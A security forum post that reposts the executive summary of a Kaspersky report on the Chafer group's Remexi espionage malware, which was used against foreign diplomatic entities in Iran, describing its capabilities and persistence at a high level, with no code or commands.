Geeks for your information News Privacy & Security News v
Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities
Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities
harlan4096 Online
MalWare Zoo Team
*******
Posts: 14,707
Threads: 9,638
Thanks Received: 9,085 in 7,235 posts
Thanks Given: 9,886
Joined: 12 September 18
#1
Information  01 February 19, 07:17
[Image: 190125-chafer-remexi.png]

Quote:Executive Summary

Throughout the autumn of 2018 we analyzed a long-standing (and still active at that time) cyber-espionage campaign that was primarily targeting foreign diplomatic entities based in Iran. The attackers were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation. This malware has previously been associated with an APT actor that Symantec calls Chafer.

The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible. The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS) bitsadmin.exe to receive commands and exfiltrate data. Its C2 is based on IIS using .asp technology to handle the victims’ HTTP requests.

Remexi developers use the C programming language and GCC compiler on Windows in the MinGW environment. They most likely used the Qt Creator IDE in a Windows environment. The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive.

XOR and RC4 encryption is used with quite long unique keys for different samples. Among all these random keys once the word “salamati” was also used, which means “health” in Farsi.

Kaspersky Lab products detect the malware described in this report as Trojan.Win32.Remexi and Trojan.Win32.Agent. This blogpost is based in our original report shared with our APT Intelligence Reporting customers last November 2018. For more information please contact: [email=intelreports@kaspersky.com]intelreports@kaspersky.com
[/email]
Technical analysis

The main tool used in this campaign is an updated version of the Remexi malware, publicly reported by Symantec back in 2015. The newest module’s compilation timestamp is March 2018. The developers used GCC compiler on Windows in the MinGW environment.
Full reading: https://securelist.com/chafer-used-remex...are/89538/
[-] The following 1 user says Thank You to harlan4096 for this post:
  • silversurfer
Find
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)
[-]
Welcome
You have to register before you can post on our site.

Username/Email:


Password:

[-]
Recent Posts
Mozilla Firefox Browser 139.0.4
Mozilla Firefox Br...harlan4096 — 08:38
Adlice Protect (formerly RogueKiller) 16...
Adlice Protect (fo...harlan4096 — 08:37
Windows 11 to merge all Search settings ...
Microsoft is redes...harlan4096 — 08:35
K-Lite Codec Pack 15.9.1 Update
Changes in 19.0.0 ...Kool — 05:00
QOwnNotes 19.1.6
25.6.1 A segmen...Kool — 15:34

[-]
Birthdays
Today's Birthdays
avatar (41)zacforat
avatar (46)NemrokReks
Upcoming Birthdays
avatar (38)Tedscolo
avatar (45)brakasig
avatar (44)JamesReshy
avatar (46)Francisemefe
avatar (39)leoniDup
avatar (38)Patrizaancem
avatar (38)biobdam
avatar (37)Barrackleve
avatar (39)Julioagopy
avatar (49)aolaupitt2558
avatar (39)storoBox
avatar (47)kinotHeemn
avatar (38)Ceballos1976
avatar (39)efynu
avatar (31)horancos

[-]
Online Staff
There are no staff members currently online.

>